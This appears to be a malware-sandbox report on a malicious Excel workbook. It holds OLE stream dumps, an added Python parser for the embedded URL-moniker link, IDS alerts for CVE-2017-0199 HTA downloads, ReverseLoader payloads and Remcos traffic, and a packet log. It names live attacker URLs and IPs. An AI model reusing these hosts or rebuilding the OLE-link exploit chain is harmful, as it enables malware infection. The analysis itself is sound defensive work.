                                                                                                            General
                                                                                                            Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                                                                                                            VBA File Name:Sheet2.cls
                                                                                                            Stream Size:977
                                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . | . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - . 0
                                                                                                            Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 90 ea c8 7c 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                            Attribute VB_Name = "Sheet2"
                                                                                                            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                                                            Attribute VB_GlobalNameSpace = False
                                                                                                            Attribute VB_Creatable = False
                                                                                                            Attribute VB_PredeclaredId = True
                                                                                                            Attribute VB_Exposed = True
                                                                                                            Attribute VB_TemplateDerived = False
                                                                                                            Attribute VB_Customizable = True
                                                                                                            

                                                                                                            General
                                                                                                            Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                                                                                                            VBA File Name:Sheet3.cls
                                                                                                            Stream Size:977
                                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - . 0
                                                                                                            Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 90 ea 85 4f 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                            Attribute VB_Name = "Sheet3"
                                                                                                            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                                                            Attribute VB_GlobalNameSpace = False
                                                                                                            Attribute VB_Creatable = False
                                                                                                            Attribute VB_PredeclaredId = True
                                                                                                            Attribute VB_Exposed = True
                                                                                                            Attribute VB_TemplateDerived = False
                                                                                                            Attribute VB_Customizable = True
                                                                                                            

                                                                                                            General
                                                                                                            Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                                                                                            VBA File Name:ThisWorkbook.cls
                                                                                                            Stream Size:985
                                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - . 0 .
                                                                                                            Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 90 ea dd f6 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                            Attribute VB_Name = "ThisWorkbook"
                                                                                                            Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                                                                                                            Attribute VB_GlobalNameSpace = False
                                                                                                            Attribute VB_Creatable = False
                                                                                                            Attribute VB_PredeclaredId = True
                                                                                                            Attribute VB_Exposed = True
                                                                                                            Attribute VB_TemplateDerived = False
                                                                                                            Attribute VB_Customizable = True
                                                                                                            

                                                                                                            General
                                                                                                            Stream Path:\x1CompObj
                                                                                                            CLSID:
                                                                                                            File Type:data
                                                                                                            Stream Size:114
                                                                                                            Entropy:4.25248375192737
                                                                                                            Base64 Encoded:True
                                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                                                                            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                            General
                                                                                                            Stream Path:\x5DocumentSummaryInformation
                                                                                                            CLSID:
                                                                                                            File Type:data
                                                                                                            Stream Size:244
                                                                                                            Entropy:2.889430592781307
                                                                                                            Base64 Encoded:False
                                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                                                                                                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                                                                                                            General
                                                                                                            Stream Path:\x5SummaryInformation
                                                                                                            CLSID:
                                                                                                            File Type:data
                                                                                                            Stream Size:200
                                                                                                            Entropy:3.250350317504982
                                                                                                            Base64 Encoded:False
                                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . . 8 . ! ; . . . . . . . . .
                                                                                                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                                                                                                            General
                                                                                                            Stream Path:MBD0032224F/\x1CompObj
                                                                                                            CLSID:
                                                                                                            File Type:data
                                                                                                            Stream Size:99
                                                                                                            Entropy:3.631242196770981
                                                                                                            Base64 Encoded:False
                                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
                                                                                                            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                            General
                                                                                                            Stream Path:MBD0032224F/Package
                                                                                                            CLSID:
                                                                                                            File Type:Microsoft Excel 2007+
                                                                                                            Stream Size:781880
                                                                                                            Entropy:7.996273102481432
                                                                                                            Base64 Encoded:True
                                                                                                            Data ASCII:P K . . . . . . . . . . ! . j A 3 . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                            Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 6a 41 33 c9 e9 01 00 00 fc 08 00 00 13 00 e1 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 dd 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                            General
                                                                                                            Stream Path:MBD00322250/\x1Ole
                                                                                                            CLSID:
                                                                                                            File Type:data
                                                                                                            Stream Size:570
                                                                                                            Entropy:5.703654441110761
                                                                                                            Base64 Encoded:False
                                                                                                            Data ASCII:. . . . . b n N . . . . . . . . . . . . l . . . y . . . K . h . . . h . t . t . p . s . : . / . / . p . r . o . v . i . t . . . u . k . / . V . H . b . T . I . 8 . ? . & . t . h . o . r . n . = . g . a . m . y . & . m . a . n . d . o . l . i . n . = . p . e . r . f . e . c . t . & . s . h . o . o . t . = . h . u . m . d . r . u . m . & . c . h . a . n . d . e . l . i . e . r . = . j . a . g . g . e . d . & . l . a . c . e . . . d H G H t 9 # n B Y . = B 0 . . . 2 > . U E . ; , . 1 . d . 7 . . . K c . * N E
                                                                                                            Data Raw:01 00 00 02 0d 95 62 6e f9 e3 ad 4e 00 00 00 00 00 00 00 00 00 00 00 00 6c 01 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b 68 01 00 00 68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 70 00 72 00 6f 00 76 00 69 00 74 00 2e 00 75 00 6b 00 2f 00 56 00 48 00 62 00 54 00 49 00 38 00 3f 00 26 00 74 00 68 00 6f 00 72 00 6e 00 3d 00 67 00 61 00 6d 00 79 00 26 00 6d 00 61 00 6e 00
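The MBD00322250/\x01Ole stream above is not an embedded data package like MBD0032224F/Package; the Data ASCII already shows a UTF-16LE URL (https://provit.uk/VHbTI8?...) and the Data Raw carries the CLSID e0c9ea79-f9ba-ce11-8c82-00aa004ba90b, which is CLSID_StdURLMoniker. The following parser is an added example, not Joe Sandbox's own extractor or part of the report. It walks the OLEStream layout from [MS-OLEDS] 2.3.4 (version, flags, link-update option, reserved, then three length-prefixed moniker streams) and the URLMoniker layout from [MS-OSHARED] 2.3.7.6 (CLSID, byte length, null-terminated UTF-16LE URL), using the 128-byte Data Raw preview printed above as input. The report truncates that preview mid-URL, so the parser tolerates a short buffer and reports the truncation; `build_ole_link` and the `example.invalid` URL it is fed are constructed for the untruncated path and are not from the sample.

```python
"""Extract the link target from the "\\x01Ole" stream of an embedded OLE object.

Added example, not part of the Joe Sandbox report. Structure per [MS-OLEDS]
2.3.4 OLEStream and [MS-OSHARED] 2.3.7.6 URLMoniker. OLE_STREAM_PREVIEW is the
128-byte Data Raw preview of MBD00322250/\\x01Ole from the report; the preview
ends mid-URL, so a short buffer must be handled, not rejected."""
import struct
import uuid

OLESTREAM_VERSION = 0x02000001
URL_MONIKER_CLSID = "79EAC9E0-BAF9-11CE-8C82-00AA004BA90B"   # CLSID_StdURLMoniker

# First 128 bytes of MBD00322250/\x01Ole exactly as printed in the report.
OLE_STREAM_PREVIEW = bytes.fromhex(
    "01000002 0d95626e f9e3ad4e 00000000 00000000 00000000 6c010000"
    "e0c9ea79 f9bace11 8c8200aa 004ba90b 68010000"
    "68007400 74007000 73003a00 2f002f00 70007200 6f007600 69007400"
    "2e007500 6b002f00 56004800 62005400 49003800 3f002600 74006800"
    "6f007200 6e003d00 67006100 6d007900 26006d00 61006e00"
)


def _sized_blob(data, off):
    """Read a 4-byte LE length at off; return (blob, declared_size, next_off).
    The blob is shorter than declared_size when the buffer is truncated."""
    (size,) = struct.unpack_from("<I", data, off)
    off += 4
    return data[off:off + size], size, off + size


def parse_ole_link(data):
    """Return flags, absolute-source moniker CLSID and (for URL monikers) the URL."""
    if len(data) < 16:
        raise ValueError("OLEStream header is shorter than 16 bytes")
    version, flags, link_update, _reserved1 = struct.unpack_from("<4I", data, 0)
    if version != OLESTREAM_VERSION:
        raise ValueError("unexpected OLEStream version 0x%08X" % version)
    off = 16
    _reserved_mon, _, off = _sized_blob(data, off)      # ReservedMonikerStream
    _relative_mon, _, off = _sized_blob(data, off)      # RelativeSourceMonikerStream
    absolute_mon, declared, _ = _sized_blob(data, off)  # AbsoluteSourceMonikerStream
    result = {
        # Spec defines Flags 0 = embedded, 1 = linked; only bit 0 is meaningful,
        # the upper bits in this sample are not spec-defined values.
        "linked": bool(flags & 1),
        "link_update_option": link_update,
        "moniker_clsid": None,
        "url": None,
        "truncated": len(absolute_mon) < declared,
    }
    if len(absolute_mon) < 16:
        return result
    result["moniker_clsid"] = str(uuid.UUID(bytes_le=absolute_mon[:16])).upper()
    if result["moniker_clsid"] == URL_MONIKER_CLSID and len(absolute_mon) >= 20:
        (length,) = struct.unpack_from("<I", absolute_mon, 16)  # URL bytes + optional trailer
        body = absolute_mon[20:20 + length]
        body = body[:len(body) & ~1]                            # whole UTF-16 code units only
        result["url"] = body.decode("utf-16-le", errors="replace").split("\x00", 1)[0]
    return result


def build_ole_link(url):
    """Constructed minimal OLEStream with a URL moniker, used to exercise the
    untruncated path. Real streams carry trailing fields (ClsidIndicator,
    display name, timestamps) that this helper deliberately omits."""
    url_bytes = url.encode("utf-16-le") + b"\x00\x00"
    moniker = (uuid.UUID(URL_MONIKER_CLSID).bytes_le
               + struct.pack("<I", len(url_bytes)) + url_bytes)
    header = struct.pack("<4I", OLESTREAM_VERSION, 1, 0, 0)   # version, linked, update opt, reserved
    return header + struct.pack("<III", 0, 0, len(moniker)) + moniker


if __name__ == "__main__":
    found = parse_ole_link(OLE_STREAM_PREVIEW)
    print(found["moniker_clsid"], found["url"], "truncated=%s" % found["truncated"])
    print(parse_ole_link(build_ole_link("https://example.invalid/path?a=1"))["url"])
```

On the report's bytes the parser yields the URL moniker CLSID and the prefix `https://provit.uk/VHbTI8?&thorn=gamy&man`, flagged as truncated; run it on the full 570-byte stream extracted from the sample (for instance with oletools or olefile) to recover the whole query string. A URL moniker as the absolute source of a linked OLE object means Office resolves that URL when the link is activated or updated, which is why this object, rather than the empty VBA modules above, is the part of the workbook to pivot on.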
General
Stream Path:Workbook
CLSID:
File Type:Applesoft BASIC program data, first line number 16
Stream Size:330959
Entropy:7.998806695646549
Base64 Encoded:True
General
Stream Path:_VBA_PROJECT_CUR/PROJECT
CLSID:
File Type:ASCII text, with CRLF line terminators
Stream Size:527
Entropy:5.256464730520852
Base64 Encoded:True
Data ASCII:ID="{75BA8BE8-8045-468F-AE80-D0962E975E65}"..Document=ThisWorkbook/&H00000000..Document=Sheet1/&H00000000..Document=Sheet2/&H00000000..Document=Sheet3/&H00000000..Name="VBAProject"..HelpContextID="0"..VersionCompatible32="393222000"..CMG="080AE0F6E4F6E4F6E
General
Stream Path:_VBA_PROJECT_CUR/PROJECTwm
CLSID:
File Type:data
Stream Size:104
Entropy:3.0488640812019017
Base64 Encoded:False
Data ASCII:ThisWorkbook.ThisWorkbook..Sheet1.Sheet1..Sheet2.Sheet2..Sheet3.Sheet3....
General
Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
CLSID:
File Type:data
Stream Size:2644
Entropy:3.9968958958419494
Base64 Encoded:False
Data ASCII:a.....@........................*\G{000204EF-0000-0000-C000-000000000046}#4.0#9#C:\PROGRA~2\COMMON~1\MICROS~1\VBA\VBA6\VBE6.DLL#Visual Basic For
General
Stream Path:_VBA_PROJECT_CUR/VBA/dir
CLSID:
File Type:data
Stream Size:553
Entropy:6.3732013600446
Base64 Encoded:True
Timestamp                        SID      Severity  Source IP:Port        Dest IP:Port          Protocol  Signature
2024-11-20T16:57:16.955138+0100  2057635  1         192.3.220.29:80       192.168.2.22:49175    TCP       ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound
2024-11-20T16:57:16.955138+0100  2057635  1         192.3.220.29:80       192.168.2.22:49178    TCP       ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound
2024-11-20T16:57:16.955138+0100  2858295  1         192.3.220.29:80       192.168.2.22:49178    TCP       ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain)
2024-11-20T16:57:16.955138+0100  2858295  1         192.3.220.29:80       192.168.2.22:49175    TCP       ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain)
2024-11-20T16:57:20.442035+0100  2024449  1         192.168.2.22:49164    192.3.220.29:80       TCP       ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl
2024-11-20T16:57:20.567470+0100  2024197  1         192.3.220.29:80       192.168.2.22:49164    TCP       ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)
2024-11-20T16:57:26.891127+0100  2024449  1         192.168.2.22:49166    192.3.220.29:80       TCP       ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl
2024-11-20T16:57:26.891141+0100  2024197  1         192.3.220.29:80       192.168.2.22:49166    TCP       ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)
2024-11-20T16:57:36.883221+0100  2858795  1         192.168.2.22:49167    192.3.220.29:80       TCP       ETPRO MALWARE ReverseLoader Payload Request (GET) M2
2024-11-20T16:57:52.360798+0100  2049038  1         142.215.209.78:443    192.168.2.22:49168    TCP       ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2
2024-11-20T16:57:55.899830+0100  2024449  1         192.168.2.22:49173    192.3.220.29:80       TCP       ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl
2024-11-20T16:58:11.865687+0100  2858796  1         192.168.2.22:49175    192.3.220.29:80       TCP       ETPRO MALWARE ReverseLoader Payload Request (GET) M1
2024-11-20T16:58:12.263546+0100  2020424  1         192.3.220.29:80       192.168.2.22:49175    TCP       ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1
2024-11-20T16:58:12.263546+0100  2020425  1         192.3.220.29:80       192.168.2.22:49175    TCP       ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2
2024-11-20T16:58:14.591521+0100  2049038  1         142.215.209.78:443    192.168.2.22:49174    TCP       ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2
2024-11-20T16:58:15.230868+0100  2036594  1         192.168.2.22:49176    192.3.101.149:6946    TCP       ET JA3 Hash - Remcos 3.x/4.x TLS Connection
2024-11-20T16:58:19.031413+0100  2803304  3         192.168.2.22:49177    178.237.33.50:80      TCP       ETPRO MALWARE Common Downloader Header Pattern HCa
2024-11-20T16:58:29.247487+0100  2858796  1         192.168.2.22:49178    192.3.220.29:80       TCP       ETPRO MALWARE ReverseLoader Payload Request (GET) M1
2024-11-20T16:58:29.669499+0100  2020424  1         192.3.220.29:80       192.168.2.22:49178    TCP       ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1
2024-11-20T16:58:29.669499+0100  2020425  1         192.3.220.29:80       192.168.2.22:49178    TCP       ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2
Timestamp  Source Port  Dest Port  Source IP  Dest IP
                                                                                                            Nov 20, 2024 16:57:20.873924971 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:20.873965025 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:20.879539967 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:20.879592896 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:20.879967928 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:20.880009890 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:20.885498047 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:20.885565042 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:20.885751963 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:20.885792971 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:20.891170979 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:20.891232967 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:20.891474009 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:20.891510010 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:20.896995068 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:20.897080898 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:20.899202108 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:20.899251938 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:20.901407003 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:20.901451111 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:20.903841019 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:20.903892040 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:20.908592939 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:20.908679008 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:20.908710957 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:20.908756018 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:20.914413929 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:20.914483070 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:20.914872885 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:20.914913893 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:20.917716980 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:20.917773008 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:20.918214083 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:20.918261051 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:20.921626091 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:20.921695948 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:20.922065973 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:20.922100067 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:20.925182104 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:20.925240040 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:20.925852060 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:20.925892115 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:20.928879976 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:20.928937912 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:20.929156065 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:20.929194927 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:20.932485104 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:20.932538033 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:20.932631016 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:20.932670116 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:20.936156034 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:20.936172962 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:20.936213970 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:20.936230898 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:21.473665953 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:21.473721027 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:21.956907034 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:21.956954956 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:22.110717058 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:22.110739946 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:22.632076025 CET49165443192.168.2.22198.244.140.41
                                                                                                            Nov 20, 2024 16:57:22.632169962 CET44349165198.244.140.41192.168.2.22
                                                                                                            Nov 20, 2024 16:57:22.632266045 CET49165443192.168.2.22198.244.140.41
                                                                                                            Nov 20, 2024 16:57:22.644815922 CET49165443192.168.2.22198.244.140.41
                                                                                                            Nov 20, 2024 16:57:22.644869089 CET44349165198.244.140.41192.168.2.22
                                                                                                            Nov 20, 2024 16:57:24.091696024 CET44349165198.244.140.41192.168.2.22
                                                                                                            Nov 20, 2024 16:57:24.091780901 CET49165443192.168.2.22198.244.140.41
                                                                                                            Nov 20, 2024 16:57:24.097614050 CET49165443192.168.2.22198.244.140.41
                                                                                                            Nov 20, 2024 16:57:24.097642899 CET44349165198.244.140.41192.168.2.22
                                                                                                            Nov 20, 2024 16:57:24.098162889 CET44349165198.244.140.41192.168.2.22
                                                                                                            Nov 20, 2024 16:57:24.098226070 CET49165443192.168.2.22198.244.140.41
                                                                                                            Nov 20, 2024 16:57:24.172058105 CET49165443192.168.2.22198.244.140.41
                                                                                                            Nov 20, 2024 16:57:24.215339899 CET44349165198.244.140.41192.168.2.22
                                                                                                            Nov 20, 2024 16:57:24.614048004 CET44349165198.244.140.41192.168.2.22
                                                                                                            Nov 20, 2024 16:57:24.614139080 CET44349165198.244.140.41192.168.2.22
                                                                                                            Nov 20, 2024 16:57:24.614276886 CET49165443192.168.2.22198.244.140.41
                                                                                                            Nov 20, 2024 16:57:24.657990932 CET49165443192.168.2.22198.244.140.41
                                                                                                            Nov 20, 2024 16:57:24.658049107 CET44349165198.244.140.41192.168.2.22
                                                                                                            Nov 20, 2024 16:57:25.568459034 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:25.692059040 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:25.692131996 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:25.692431927 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:25.815664053 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:26.890983105 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:26.891010046 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:26.891022921 CET8049166192.3.220.29192.168.2.22
